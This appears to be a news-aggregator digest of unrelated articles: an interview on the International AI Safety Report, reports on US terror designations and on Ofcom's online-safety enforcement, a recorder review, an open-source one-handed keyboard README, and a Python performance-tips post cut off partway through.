International AI Safety Report: A Conversation with Shalaleh Rismani of Mila - Quebec AI Institute Institute

Internet Exchange
internet.exchangepoint.tech
2025-11-13 15:30:00
Inside the thinking behind the International AI Safety Report’s newest update on AI capabilities and risks....
Original Article
internet governance

Inside the thinking behind the International AI Safety Report’s newest update on AI capabilities and risks.

International AI Safety Report: A Conversation with Shalaleh Rismani of Mila - Quebec AI Institute Institute
Photo by Claudio Schwarz / Unsplash

By Audrey Hingle in conversation with Shalaleh Rismani

The International AI Safety Report brings together research from experts around the world to provide a shared evidence base on the capabilities and risks of advanced AI systems. IX’s Mallory Knodel saw the main report presented at the United Nations General Assembly earlier this year, where it was introduced as part of an effort to inform global cooperation on AI governance.

To better understand the thinking behind the report and its recent update, I spoke with Shalaleh Rismani of Mila - Quebec AI Institute , one of the authors of the recent First Key Update . The update focuses on rapid advances in AI reasoning capabilities and examines how those developments intersect with emerging risks, including cybersecurity, biological threats, and impacts on labor markets. You can read both the report and the update at internationalaisafetyreport.org

Why this report, and why now? What gap did the team hope to fill in the global AI safety conversation?

This is the second year the safety report has been produced as a collaborative project. The main report’s scope was set early by the lead writers and panelists, with input from experts around the world. The goal was to synthesize evidence on the most advanced AI systems, including technologies already being rolled out and others still in development, in a way that would be useful for policymakers.

As the field evolved, the team realized that one annual report was not enough to keep up with the pace of change. This year, the leadership decided to produce two interim updates in addition to the main report. The first, released in October, focused heavily on capabilities, particularly what researchers refer to as “reasoning capabilities.” These include systems that can generate multiple possible answers or ask clarifying questions before responding. The second update, coming at the end of November, will continue tracking those advances, while the next full report will be published in February.

The report cites thousands of studies. How did the team ensure that this huge body of research remains usable for policymakers and practitioners?

The main goal is to bring in as much evidence from the academic literature as possible and make it accessible to policymakers and the public. Each section is led by researchers embedded in the literature, and multiple rounds of revisions happen with expert reviewers.

Every citation goes through a vetting process to confirm that it comes from credible academic sources. Because AI research moves so fast, much of the work is pre-published, which makes it harder to assess. Still, the idea is to present the full range of research and show both where strong evidence exists and where gaps remain.

Publishing is one thing, but ensuring impact is another. How does the team think about getting the report in front of key audiences?

The dissemination strategy is a collaborative effort between the Chair, the writing team and the secretariat. The team participates in many briefings with governments and policymakers around the world. For example, we engaged directly with policymakers on the findings of the first key update, including from the EU, India, UK, Canada, Singapore, UAE, Australia, Japan, Kenya and others. Because panelists, senior advisers, and reviewers come from different countries, there is already strong buy-in. Civil society, academia, and major technology companies are also involved in the process, which helps expand the report’s reach.

How did the team integrate human rights considerations into what is otherwise a very technical safety framework?

Human rights are not presented as a standalone section, but they are integrated throughout the report. One way is by identifying where evidence exists and where it does not, which highlights gaps relevant to fairness, privacy, and equity. Many evaluations measure performance on benchmarks but not real-world outcomes. Pointing out those gaps helps guide future human rights work by showing where contextual studies are needed.

Some of the risks discussed in this update also touch directly on human rights. For example, the growing adoption of AI companionship technologies raises concerns about loneliness and emotional well-being. The report also notes early evidence of labor market impacts, particularly in software engineering, although broader economic effects are still unclear.

The report came out of a large international process. What did that collaboration reveal about where consensus exists and where it still breaks down when it comes to defining and governing AI safety?

There is broad agreement that AI systems are improving on certain benchmarks, but less consensus on whether those benchmarks accurately measure complex abilities like reasoning. Some experts question whether the current evaluation frameworks are valid for assessing reasoning at all.

There is also consensus that potential risks should be monitored proactively rather than ignored, though there is debate about which risks are most pressing. Monitoring and controllability risks, for instance, are still contested. Some lab studies suggest models underperform when they know they are being evaluated, while others do not show this effect. In contrast, there is stronger agreement around risks such as AI companionship, labor market disruption, and cyber offense and defense.

The report brings together such a wide range of evidence and perspectives. How do you think about assessing risk and avoiding overhyping progress?

The report does not use a specific framework to assess risk. There are frameworks being proposed for evaluating AI systems, and we report on developments in those frameworks rather than applying one ourselves.

We also recognize the risk of overhyping AI progress, especially right now. To address this, we try to look for real-world evidence of both improvements and shortcomings. The review processes and involvement of stakeholders are other ways this can be managed and help keep the report balanced.

If you had to highlight one or two takeaways that you hope will shape AI policy or practice in 2026, what would they be?

There is a significant gap in evaluating real-world impacts. Policymakers need a clearer understanding of how AI systems affect work, research, and society, not just benchmark scores. Creating infrastructure to support independent evaluations and audits will be key, whether through third-party organizations or public feedback mechanisms.

The second update, coming later this year, will focus on risk management practices and the solutions being proposed to address them. The goal is to show that progress is happening while recognizing that there is still much more work to do.


IX at MozFest

We’re back from our recent session at MozFest and buzzing with excitement from all of the ideas and connections we made. The room was packed for our session, Encryption and Feminism: Reimagining Child Safety Without Surveillance , and the conversation went far beyond the usual encryption talking points. Participants pushed into the real tensions between safety and care, shared lived experiences of how surveillance harms survivors and marginalised communities, and offered concrete ideas for what genuinely feminist approaches to child safety could look like.

We’re now working through the feedback forms and pulling those insights into a draft set of feminist principles for encryption. We’re also exploring an online rerun so more people can join the discussion and contribute, since not everyone interested could make it to MozFest and many at MozFest who wanted to attend couldn’t fit everyone into the room. So stay tuned!

Support the Internet Exchange

If you find our emails useful, consider becoming a paid subscriber! You'll get access to our members-only Signal community where we share ideas, discuss upcoming topics, and exchange links. Paid subscribers can also leave comments on posts and enjoy a warm, fuzzy feeling.

Not ready for a long-term commitment? You can always leave us a tip .

Become A Paid Subscriber


From the Group Chat 👥 💬

This week in our Signal community, we got talking about:

IX contributor Heather Burns blew up Hacker News and even got a shout-out in the Financial Times for her viral blog post Time to start de-Appling ,” which warns UK users to migrate their data off iCloud after Apple announced it will disable Advanced Data Protection under the Investigatory Powers Act. Heather argues the move exposes how post-Brexit tech policy is eroding privacy rights. The post comes hot on the heels of our MozFest session on encryption and feminism, where we explored similar themes: governments invoke “child safety” to justify weakening encryption, sometimes at the expense of the very people it protects.


Internet Governance

Digital Rights

Technology for Society

Privacy and Security

Upcoming Events

Careers and Funding Opportunities

United States

Global

Opportunities to Get Involved

What did we miss? Please send us a reply or write to editor@exchangepoint.tech .

Marco Rubio Wants to Imprison You on Terror Charges for Supporting Nazi Punchers

Intercept
theintercept.com
2025-11-15 11:00:00
The Trump administration moved to designate antifa groups abroad as foreign terrorists — setting up the prosecution of their U.S. allies. The post Marco Rubio Wants to Imprison You on Terror Charges for Supporting Nazi Punchers appeared first on The Intercept....
Original Article

Hungarian Prime Minister Viktor Orbán’s government launched a continentwide manhunt when a group of European antifascists attacked a neo-Nazi rally three years ago.

Orbán, though, showed no such appetite for cracking down on the annual fascist rally, which this February drew attendees sporting SS patches, swastikas, and the “Totenkopf” death’s head symbol — all under the watchful eye of Hungarian police.

The aggressive response to antifascist activists, compared to the kid-gloves treatment of neo-Nazi demonstrators, has roiled European politics for years.

On Thursday, Secretary of State Marco Rubio joined the fray, inserting the U.S. into the debate by declaring the antifascist group that attacked the 2023 rally a terrorist organization.

Though the designation is aimed at foreign groups, Rubio said that he was acting in accordance with President Donald Trump’s National Security Presidential Memorandum-7, or NSPM-7, regarding purported “domestic” terrorists.

The terror designation will cut off the small Antifa Ost group, and three others designated by Rubio on Thursday, from raising funds in the U.S. It could also imperil American antifascist groups with civil and criminal allegations of “material support” for terrorism, a civil rights lawyer warned.

“The clever way to go about it for them is to designate some foreign organization, because a foreign organization can be designated and there is almost no due process,” said Shane Kadidal, a lawyer at the Center for Constitutional Rights. “Then, you go after the U.S. groups for supposedly coordinating their political messages with the messages of the foreign groups.”

Rubio’s announcement follows on the heels of one from Trump in September that he was designating antifa a “major terrorist organization,” which has no basis in law. The foreign terrorist organization designations, however, entail significant legal consequences.

Under a 2010 ruling from the Supreme Court, domestic groups can face “material support” charges for providing nonviolent support to designated foreign terrorist organizations.

Kadidal said the Trump administration could essentially try to use the foreign terrorist designations as a workaround to target domestic antifascists with “material support” charges. Key questions such as whether domestic activists had knowledge and intent to coordinate with foreign groups can be left for a jury to decide based on circumstantial evidence, he said.

“That is one of those things that makes this so dangerous,” he said. “The jury may just decide, ‘Yeah, whatever you have alleged about this coordination of messaging is true, because these are bad people in front of me.’”

“Juries do this thing all the time. They jump to conclusions.”

Thousands of neo-Nazis gathered in Budapest for the annual so-called Day of Honour march, an event that openly glorifies those who fought alongside the Nazis.

Participants displayed Nazi insignia, uniforms, and slogans, with known extremists from across Europe joining the rally.… pic.twitter.com/ZUY1a9eS9J

— European Jewish Congress (@eurojewcong) February 10, 2025

Street Brawlers

The antifascists who targeted the neo-Nazi “Day of Honor” rally held in Budapest in February 2023 are accused of beating and bloodying several people, some of whom may have been victims of mistaken identity, according to Hungarian authorities.

Even leftists who disapprove of street violence, however, were outraged by what happened next. Orbán’s government relentlessly sought the extradition of alleged participants in the antifascist action and pressed for long prison terms.

In the years since, neo-Nazis have continued to gather in Budapest under the protection of Hungarian police, in sharp contrast to the country’s ban on pride parades . Antifa Ost’s alleged members, meanwhile, have faced trials in Germany and Hungary, where one faces up to 23 years in prison.

In addition to Antifa Ost, Rubio designated three other groups as terrorists: the Informal Anarchist Federation/International Revolutionary Front of Italy; and in Greece, the groups Armed Proletarian Justice and Revolutionary Class Self-Defense.

The groups’ actions — ranging from the bombing of a Greek train office to the non-fatal shooting of a nuclear company’s executive — have drawn little notice in the U.S., but the State Department cast them in dramatic terms in a social media post.

“Anarchist militants have waged terror campaigns in the United States and Europe, conspiring to undermine the foundations of Western Civilization through their brutal attacks,” the department said .

Rubio promised more crackdowns to come.

“The United States will continue using all available tools to protect our national security and public safety,” he said in a statement, “and will deny funding and resources to terrorists, including targeting other Antifa groups across the globe.”

Trump’s Hungarian Pals

Despite lacking a basis in law, Trump’s domestic terror label for antifascists has already had real-world effects.

Last month, the International Anti-Fascist Defence Fund, a group that has supported antifascists in the U.S., announced that it was shutting down its fundraising channels as a “precaution” in response to Trump’s “edict.” The group has raised money for antifascists in the U.S. and abroad, including the counter-protesters in Budapest.

“We are presently exploring our options for re-establishing the Defence Fund’s infrastructure in a country not currently governed by fascists and we hope to have good news about that shortly,” the group said.

When it comes to the designations Rubio issued this week, meanwhile, the administration could face complications in wielding them directly against activists. Prosecutors would still have to convince judges and juries to secure criminal convictions against domestic activists.

The designations from Rubio, however, could also open the floodgates for private actors who could file civil lawsuits on even flimsier grounds.

Rubio designated the antifascist groups as both specially designated global terrorists and foreign terrorist organizations. The latter designation, which goes into effect November 20, opens domestic groups to civil liability for allegedly providing material support.

The same legal theory has been used by pro-Israel law firms to harass pro-Palestine student protesters . Even if the cases are eventually thrown out, they can smother activists in costly court proceedings for years, Kadidal said.

“What the government can do is already really, really broad and concerning,” he said. “What they can unleash private actors to do without any accountability is a whole ’nother bag of tricks.”

ucs-detect: automatically test the Unicode version and support level of a terminal emulator

Lobsters
ucs-detect.readthedocs.io
2025-11-15 10:39:54
Comments...

Jonathan Dowland: Zoom R8

PlanetDebian
jmtd.net
2025-11-15 10:14:34
When I started looking at synths again, I had a feeling I would want to record from them, and ideally not with a computer. To that end, I also bought a second-hand standalone multitrack recorder, the Zoom R8. It's a little desktop console with two inputs, a built-in mic, and 8 sliders for ...
Original Article

When I started looking at synths again, I had a feeling I would want to record from them, and ideally not with a computer. To that end, I also bought a second-hand standalone multitrack recorder, the Zoom R8.

It's a little desktop console with two inputs, a built-in mic, and 8 sliders for adjusting the playback of 8 (ostensibly) independent tracks. It has a USB port to interface with a computer, and features some onboard effects (delay, reverb, that kind-of thing).

Look a bit closer, and the USB port is mini-USB, which gives away its age (and I'll never get rid of mini-USB cables, will I?). The two inputs are mono, so to capture stereo output from the minilogue-xd I need to tie up both inputs. Also, the 8 tracks are mono, so it's more like a stereo 4-track.

The effects (what little I've played with them) are really pretty cool; and it's great to apply them to a live signal. We had some fun running them over a bass guitar. However you can only use them for 44.1 kHz sample rate. If you ignore the effects the device supports 48 kHz.

I've ended up using it as my main USB interface on my computer; It's great for that. The internal mic ended up being too weak to use for video calls. As a USB interface, my computer can receive the signal from the synth (and I've wasted more time than I care to admit trying to wrestle with the Linux audio stack to do something with that).

It can also run on batteries, which opens up the possibility of recording piano with my daughter, or field recording or suchlike.

Writing this up serves as a reminder to me of why I bought it, and I now intend to spend a little more time using it that way and stop wasting time fighting ALSA/PulseAudio/PipeWire/PortAudio/etc.

Father of teen whose death was linked to social media has ‘lost faith’ in Ofcom

Guardian
www.theguardian.com
2025-11-15 10:00:07
Ian Russell says watchdog lacks ‘urgency’ and is not willing to use its powers ‘to the extent required’ The father of Molly Russell, a British teenager who killed herself after viewing harmful online content, has called for a change in leadership at the UK’s communications watchdog after losing fai...
Original Article

The father of Molly Russell, a British teenager who killed herself after viewing harmful online content , has called for a change in leadership at the UK’s communications watchdog after losing faith in its ability to make the internet safer for children.

Ian Russell, whose 14 year-old daughter took her own life in 2017, said Ofcom had “repeatedly” demonstrated that it does not grasp the urgency of keeping under-18s safe online and was failing to implement new digital laws forcefully.

“I’ve lost confidence in the current leadership at Ofcom,” he told the Guardian. “They have repeatedly demonstrated that they don’t grasp the urgency of this task and they have shown that they don’t seem to be willing to use their powers to the extent that is required.”

Russell’s comments came in the same week the technology secretary, Liz Kendall, wrote to Ofcom saying she was “deeply concerned” about delays in rolling out parts of the Online Safety Act (OSA), a landmark piece of legislation laying down safety rules for social media, search and video platforms.

Russell, who has become an influential internet safety campaigner since his daughter’s death, said that last year he raised concerns with Ofcom’s chief executive, Melanie Dawes, about an online suicide forum accessible to UK users .

Ofcom opened an investigation into the site this year, shortly after assuming new regulatory powers from the OSA, and the forum voluntarily geo-blocked access to UK users.

But Russell said the investigation appeared to have “stalled” before the regulator ramped up its probe this month – when it emerged the forum was still available to UK users through a previously undetected “mirror site”.

A teenage girl in school uniform, smiling
Molly Russell died in 2017. Photograph: PA

“If Ofcom can’t deal with something as black and white, cut and dried as that, you have to question what else they can deal with,” Russell said.

Ofcom addressed Russell’s concerns in a letter, saying that the site’s geo-block had been constantly monitored, but the mirror site – operating under a wholly different domain name – had come to the regulator’s attention only this month.

Russell said he shared Kendall’s disappointment in delays to implementing further elements of the OSA, including strict rules for the largest and most influential online platforms. Ofcom has said the delays were due to a court challenge from the Wikimedia foundation – the charity behind Wikipedia.

The watchdog said it had the “highest respect” for bereaved families and pointed to achievements under its watch, such as age checks for pornography sites and a crackdown on child sexual abuse material.

“We are working with urgency to drive tech firms to deliver a safer life online for children and adults in the UK, and while the job is not done, change is happening,” a spokesperson said.

The Molly Rose Foundation, a charity founded by Molly’s family, has submitted a letter to the UK government calling on ministers to extend a legal requirement for transparency from public officials to apply to tech companies as well.

The letter urged Alex Davies-Jones, the victims minister, to expand the remit of the public authority (accountability) bill, which introduces a “duty of candour” for public officials.

The bill, brought in after criticism of how police officers presented evidence at the Hillsborough inquiry, requires public bodies and officials to help investigations – including coroner’s courts – by providing information and evidence proactively, without favouring their own position.

The foundation believes that requiring companies regulated by the OSA to abide by the same rules would prevent them from dragging their heels over submitting evidence in the case of a death where social media use was potentially involved.

The inquest into Molly’s death was subject to delays owing to wrangles with Meta over submitting evidence.

The letter said: “This shift would fundamentally reset the relationship between tech companies and their victims – a move that would require tech companies to act transparently and expeditiously when responding to legal requests.”

Recent legislation has bolstered coroners’ powers, enabling them to demand evidence of social media use from tech companies under the OSA and prevent important data from being deleted, but the letter’s signatories believe tougher powers are needed.

Among more than 40 signatories were members of the group Bereaved Families for Online Safety and the Meta whistleblower Arturo Béjar.

A government spokesperson pointed to the legal changes enhancing coroners’ powers to require information from tech firms.

“The Online Safety Act supports coroners conducting inquests and families seeking the truth in compelling companies to share data fully where there is evidence of a link between a child’s death and their social media use',” said the spokesperson.

“As promised in our manifesto, we have also strengthened this by also giving coroners the power to request that data is preserved to support inquests. We will not hesitate to act, and will work with families and campaigners to ensure we protect families and children.”

One Handed Keyboard

Hacker News
github.com
2025-11-15 09:44:15
Comments...
Original Article

One-Handed Keyboard

我们收到了一封特殊的邮件。来信者的女儿在上学途中不幸遭到重型卡车碾压,右手永久失去了功能,用电脑的时候手得在键盘和鼠标之间频繁切换,打字很慢,很累。他想让我们帮他女儿做一个单手键盘。

左手小键盘

左手大键盘

这是一把单模且集成了轨迹球的机械键盘,固件使用 QMK ,感谢所有为 QMK 社区做出贡献的开发者。

键盘制作参考: 【何同学】我们做了个特别的键盘…

硬件开源: HTXStudio单手键盘

GitHub repository

Gitee repository

开发环境与搭建参考 这里 ,固件源码在 这里

本仓库的资料内容包括:

  • 左右手一共三款键盘的8块PCB,提供立创EDA工程。
  • VIA改键配置文件,以及编译完成的固件。
  • 模型设计文件。

仓库目录结构

Docs(文档)

芯片的数据手册与图片。

Firmware(固件)

三款不同型号键盘的QMK固件,以及用于VIA改键的JSON文件。

Hardware(硬件)

嘉立创EDA的项目文件。

Model(模型)

每个型号键盘使用到的模型文件,加工文件。


制作指南

PCB:

1-右手键盘-热插拔(大):板材FR-4,板厚1.6mm,四层板,层压结构JLC04161H-3313,阻抗管控+/-20%。

1-左手键盘-焊板(小):板材FR-4,板厚1.6mm,双层板,ALPS黄轴插入时需稍用力安装到位。

1-左手键盘-热插拔(大):板材FR-4,板厚1.6mm,四层板,层压结构JLC04161H-3313,阻抗管控+/-20%。

2-TypeC:板材FR-4,板厚1.6mm,双层板,标识CON1(仅适用于大键盘)。

3-轨迹球:板材FR-4,板厚1.6mm,双层板,模块需注意焊接方向,标识CON3。

4-鼠标滚轮:板材FR-4,板厚1.6mm,双层板,建议使用7mm高编码器,6mm高按键,按键触发压力≤180g,标识CON2。

5-方向按键:板材FR-4,板厚1.6mm,双层板,ALPS黄轴插入时需稍用力安装到位,标识CON4。

6-主控板-左手(小):板材FR-4,板厚1.6mm,双层板。

  • 其中3款为键盘控制公用小板 《3-轨迹球》《4-鼠标滚轮》《5-方向按键》
  • 《5-方向按键》 《1-左手键盘-焊板(小)》 ,按键轴使用ALPS黄轴。
  • 注意左右手大键盘并非完全镜像。
  • 轨迹球控制使用SPI1通道,滚轮有单独两条信号线,这可以使得替换其它控制设备而不需要较大的调整。
  • 主控使用 STM32G431CBU6。
  • 兼容A to C 或 C to C 数据线。

打印件:

键帽:树脂、PLA等。

轨迹球座:树脂、PLA等。

鼠标左右键:树脂、PLA等。

外壳:树脂、PLA等。

底座:树脂、PLA等。

加工:

定位板:推荐材料pom,厚1.5mm。

定位板棉条:单面留胶。

夹心棉:推荐材料poron,厚3.5mm。

轴座棉:厚2mm。

底棉:推荐材料poron,厚4mm。

硅胶垫(仅小键盘使用):厚5mm,硬度Shore 00-10。

五金:

大键盘用量(颗) 小键盘用量(颗)
M3×3×4热熔铜螺母 8 8
M2×2×3热熔铜螺母 2 -
M2×3×3热熔铜螺母 17 12
M3×6沉头螺丝 2 6
M3×15沉头螺丝 - 4
M3×22沉头螺丝 6 -
M2×8杯头螺丝 4 4
M2×3杯头螺丝 2 -
M2×5杯头螺丝 13 8
M3×16扁头螺丝 - 2

其它:

轨迹球:直径25mm,材质PTFE。

润滑球:直径2mm,材质PTFE,安装于打印件轨迹球座中,数量6颗。

滚轮:推荐直径19mm-20mm之间,厚4mm-5mm之间,材质金属。

卫星轴:2U钢板卫星轴。

按键轴:小键盘57颗超小ALPS黄轴,大键盘57颗常见机械轴。

排线:间距0.5mm,8P反向,10cm2条,15cm2条。

  • 控制板和小板的FPC座均有CON标识,对应接口相接。
  • 文件内使用可上下接FPC排线座,需要注意排线座均下接的情况下,使用反向排线连接。

模型结构:

左手小键盘爆炸

左手大键盘爆炸

安装顺序:

以大键盘为例

装配前的前置工作

  • 先将4块小PCB使用排线连接至键盘本体PCB,烧录程序。
  • 安装3-5个轴体,滚轮和轨迹球。装配前确保功能是正常的。
  • 在打印的外壳与底座对应位置,安装正确的热熔铜螺母。
  • 键帽印字。
  • 将棉条贴在定位板突出部分(正反面都有)。

第一次烧录固件时,可以按住PCB背面标有 "B" 的按钮,再插入USB线进行固件烧录。

若更新固件可以按住键盘上的 "ESC" 键,再插入USB线进行固件烧录。

更多可以参考 Flashing Your Keyboard (QMK)

接下来开始装配

  1. 将4块小板使用螺丝安装到底座对应位置(注意排线和安装方向),轨迹球座在下方安装螺丝。
  2. 将左右键使用螺丝固定在键盘PCB上。
  3. 从下到上以底棉、轴座棉、键盘PCB、夹心棉、定位板顺序放入底座扇形区域。
  4. 插入按键轴体。
  5. 放入外壳,在下方使用螺丝固定。
  6. 安装键帽,完成装配。

螺丝螺母安装指南可以参考 这里

最后,这是我们第一次开源项目,如果有什么不足欢迎大家批评指正,感谢大家。


引用

Quantum Mechanical Keyboard Firmware

mrjohnk. ADNS-9800. GitHub repository

10 patterns for faster python code

Lobsters
blog.jetbrains.com
2025-11-15 09:28:38
Comments...
Original Article
Pycharm logo

The only Python IDE you need.

Web Development

10 Smart Performance Hacks For Faster Python Code

This is a guest post from Dido Grigorov , a deep learning engineer and Python programmer with 17 years of experience in the field.

10 Smart Performance Hacks For Faster Python Code

In the rapidly evolving domain of software development, Python has established itself as a premier language, renowned for its simplicity, readability, and versatility. It underpins a vast range of applications, from web development to artificial intelligence and data engineering. However, beneath its elegant syntax lies a potential challenge: performance bottlenecks that can transform otherwise efficient scripts into noticeably sluggish processes.

Whether the task involves processing large datasets, developing real-time systems, or refining computational efficiency, optimizing Python code for speed can be a decisive factor in achieving superior results.

This guide presents 10 rigorously tested performance-enhancement strategies. Drawing upon Python’s built-in capabilities, efficient data structures, and low-level optimization techniques, it offers practical methods to accelerate code execution without compromising the language’s characteristic clarity and elegance. Supported by empirical benchmarks and illustrative code examples, these techniques demonstrate how incremental improvements can yield substantial performance gains – empowering developers to transition from proficient practitioners to true experts in high-performance Python programming.

Let’s dive in and turbocharge your Python prowess!

Hack 1: Leverage sets for membership testing

When you need to check whether an element exists within a collection, using a list can be inefficient – especially as the size of the list grows. Membership testing with a list ( x in some_list ) requires scanning each element one by one, resulting in linear time complexity ( O(n) ):

big_list = list(range(1000000))
big_set = set(big_list)
start = time.time()
print(999999 in big_list)
print(f"List lookup: {time.time() - start:.6f}s")

start = time.time()
print(999999 in big_set)
print(f"Set lookup: {time.time() - start:.6f}s")

Time measured:

  • List lookup: ~0.015000s
  • Set lookup: ~0.000020s

In contrast, sets in Python are implemented as hash tables, which allow for constant-time ( O(1) ) lookups on average. This means that checking whether a value exists in a set is significantly faster, especially when dealing with large datasets.

For tasks like filtering duplicates, validating input, or cross-referencing elements between collections, sets are far more efficient than lists. They not only speed up membership tests but also make operations like unions, intersections, and differences much faster and more concise.

By switching from lists to sets for membership checks – particularly in performance-critical code – you can achieve meaningful speed gains with minimal changes to your logic.

Hack 2: Avoid unnecessary copies

Copying large objects like lists, dictionaries, or arrays can be costly in both time and memory. Each copy creates a new object in memory, which can lead to significant overhead, especially when working with large datasets or within tight loops.

Whenever possible, modify objects in place instead of creating duplicates. This reduces memory usage and improves performance by avoiding the overhead of allocating and populating new structures. Many built-in data structures in Python provide in-place methods (e.g. sort , append , update ) that eliminate the need for copies.

numbers = list(range(1000000))
def modify_list(lst):
    lst[0] = 999
    return lst
start = time.time()
result = modify_list(numbers)
print(f"In-place: {time.time() - start:.4f}s")

def copy_list(lst):
    new_lst = lst.copy()
    new_lst[0] = 999
    return new_lst
start = time.time()
result = copy_list(numbers)
print(f"Copy: {time.time() - start:.4f}s")

Time measured:

  • In-place: ~0.0001s
  • Copy: ~0.0100s

In performance-critical code, being mindful of when and how objects are duplicated can make a noticeable difference. By working with references and in-place operations, you can write more efficient and memory-friendly code, particularly when handling large or complex data structures.

Hack 3: Use __slots__ for memory efficiency

By default, Python classes store instance attributes in a dynamic dictionary ( __dict__ ), which offers flexibility but comes with memory overhead and slightly slower attribute access.

Using __slots__ allows you to explicitly declare a fixed set of attributes for a class. This eliminates the need for a __dict__ , reducing memory usage – which is especially beneficial when creating many instances of a class. It also leads to marginally faster attribute access due to the simplified internal structure.

While __slots__ does restrict dynamic attribute assignment, this trade-off is often worthwhile in memory-constrained environments or performance-sensitive applications. For lightweight classes or data containers, applying __slots__ is a simple way to make your code more efficient.

class Point:
    __slots__ = ('x', 'y')
    def __init__(self, x, y):
        self.x = x
        self.y = y
start = time.time()
points = [Point(i, i+1) for i in range(1000000)]
print(f"With slots: {time.time() - start:.4f}s")

Time measured:

  • With __slots__ : ~0.1200s
  • Without __slots__ : ~0.1500s

Hack 4: Use math functions instead of operators

For numerical computations, Python’s math module provides functions that are implemented in C, offering better performance and precision than equivalent operations written in pure Python.

For example, using math.sqrt() is typically faster and more accurate than raising a number to the power of 0.5 using the exponentiation ( ** ) operator. Similarly, functions like math.sin() , math.exp() , and math.log() are highly optimized for speed and reliability.

These performance benefits become especially noticeable in tight loops or large-scale calculations. By relying on the math module for heavy numerical work, you can achieve both faster execution and more consistent results – making it the preferred choice for scientific computing, simulations, or any math-heavy code.

Use math functions instead of operators

PyCharm makes it even easier to take advantage of the math module by providing intelligent code completion. Simply typing math. triggers a dropdown list of all available mathematical functions and constants – such as sqrt() , sin() , cos() , log() , pi , and many more – along with inline documentation.

This not only speeds up development by reducing the need to memorize function names, but also encourages the use of optimized, built-in implementations over custom or operator-based alternatives. By leveraging these hints, developers can quickly explore the full breadth of the module and write cleaner, faster numerical code with confidence.

import math
numbers = list(range(10000000))
start = time.time()
roots = [math.sqrt(n) for n in numbers]
print(f"Math sqrt: {time.time() - start:.4f}s")

start = time.time()
roots = [n ** 0.5 for n in numbers]
print(f"Operator: {time.time() - start:.4f}s")

Time measured:

  • math.sqrt : ~0.2000s
  • Operator: ~0.2500s

Hack 5: Pre-allocate memory with known sizes

When building lists or arrays dynamically, Python resizes them in the background as they grow. While convenient, this resizing involves memory allocation and data copying, which adds overhead – especially in large or performance-critical loops.

If you know the final size of your data structure in advance, pre-allocating memory can significantly improve performance. By initializing a list or array with a fixed size, you avoid repeated resizing and allow Python (or libraries like NumPy) to manage memory more efficiently.

This technique is particularly valuable in numerical computations, simulations, and large-scale data processing, where even small optimizations can add up. Pre-allocation helps reduce fragmentation, improves cache locality, and ensures more predictable performance.

start = time.time()
result = [0] * 1000000
for i in range(1000000):
    result[i] = i
print(f"Pre-allocated: {time.time() - start:.4f}s")

start = time.time()
result = []
for i in range(1000000):
    result.append(i)
print(f"Dynamic: {time.time() - start:.4f}s")

Time measured:

  • Pre-allocated: ~0.0300s
  • Dynamic: ~0.0400s

Hack 6: Avoid exception handling in hot loops

While Python’s exception handling is powerful and clean for managing unexpected behavior, it’s not designed for high-frequency use inside performance-critical loops. Raising and catching exceptions involves stack unwinding and context switching, which are relatively expensive operations.

In hot loops – sections of code that run repeatedly or process large volumes of data – using exceptions for control flow can significantly degrade performance. Instead, use conditional checks ( if , in , is , etc.) to prevent errors before they occur. This proactive approach is much faster and leads to more predictable execution.

Reserving exceptions for truly exceptional cases, rather than expected control flow, results in cleaner and faster code – especially in tight loops or real-time applications where performance matters.

numbers = list(range(10000000))
start = time.time()
total = 0
for i in numbers:
    if i % 2 != 0:
        total += i // 2
    else:
        total += i
print(f"Conditional: {time.time() - start:.4f}s")

start = time.time()
total = 0
for i in numbers:
    try:
        total += i / (i % 2)
    except ZeroDivisionError:
        total += i
print(f"Exception: {time.time() - start:.4f}s")

Time measured:

  • Conditional: ~0.3000s
  • Exception: ~0.6000s

Hack 7: Use local functions for repeated logic

When a specific piece of logic is used repeatedly within a function, defining it as a local (nested) function – also known as a closure – can improve performance and organization. Local functions benefit from faster name resolution because Python looks up variables more quickly in local scopes than in global ones.

In addition to the performance gain, local functions help encapsulate logic, making your code cleaner and more modular. They can also capture variables from the enclosing scope, allowing you to write more flexible and reusable inner logic without passing extra arguments.

This technique is particularly useful in functions that apply the same operation multiple times, such as loops, data transformations, or recursive processes. By keeping frequently used logic local, you reduce both runtime overhead and cognitive load.

Hint: Use AI Assistant’s Suggest Refactoring

If you’re using PyCharm (or any JetBrains product) with the AI Assistant plugin , one particularly powerful tool is Suggest Refactoring . With it, you can select a segment of code, invoke the AI Assistant, and ask it to propose cleaner or more efficient alternatives – all in one go.

The assistant shows you a “refactored” version of your code, lets you view the diff (what would change), and you can accept either selected snippets or the whole block. This helps maintain consistency, enforce best practices, and catch opportunities for improvement you might otherwise miss.

AI Assistant’s Suggest Refactoring

How to use Suggest Refactoring

Here are step-by-step instructions (as per JetBrains’ documentation) on how to use this feature:

  1. Select the code fragment you want to refactor.
  2. When the popup appears (e.g. small lightbulb or context menu), click the AI Assistant icon.
  3. Choose Suggest Refactoring in the menu.
  4. The AI Chat pane then opens with its proposed refactorings. In it, you can:
    • Click Show Diff to compare the original against the proposed code.
    • Or if you prefer, you can select Apply Immediately to skip the diff and apply the suggestion directly.
  5. If you like the suggested changes, click Accept on individual snippets (in the gutter) or Accept All to replace the entire selected fragment.
  6. If you don’t like the suggestions, you can always close the diff or dialog without applying.
def outer():
    def add_pair(a, b):
        return a + b
    result = 0
    for i in range(10000000):
        result = add_pair(result, i)
    return result
start = time.time()
result = outer()
print(f"Local function: {time.time() - start:.4f}s")

def add_pair(a, b):
    return a + b
start = time.time()
result = 0
for i in range(10000000):
    result = add_pair(result, i)
print(f"Global function: {time.time() - start:.4f}s")

Time measured:

  • Local function: ~0.4000s
  • Global function: ~0.4500s

Hack 8: Use itertools for combinatorial operations

When dealing with permutations, combinations, Cartesian products, or other iterator-based tasks, Python’s itertools module provides a suite of highly efficient, C-optimized tools tailored for these use cases.

Functions like product() , permutations() , combinations() , and combinations_with_replacement() generate elements lazily, meaning they don’t store the entire result in your computer’s memory. This allows you to work with large or infinite sequences without the performance or memory penalties of manual implementations.

In addition to being fast, itertools functions are composable and memory-efficient, making them ideal for complex data manipulation, algorithm development, and problem-solving tasks like those found in simulations, search algorithms, or competitive programming. When performance and scalability matter, itertools is a go-to solution.

from itertools import product
items = [1, 2, 3] * 10
start = time.time()
result = list(product(items, repeat=2))
print(f"Itertools: {time.time() - start:.4f}s")

start = time.time()
result = []
for x in items:
    for y in items:
        result.append((x, y))
print(f"Loops: {time.time() - start:.4f}s")

Time measured:

  • itertools : ~0.0005s
  • Loops: ~0.0020s

Hack 9: Use bisect for sorted list operations

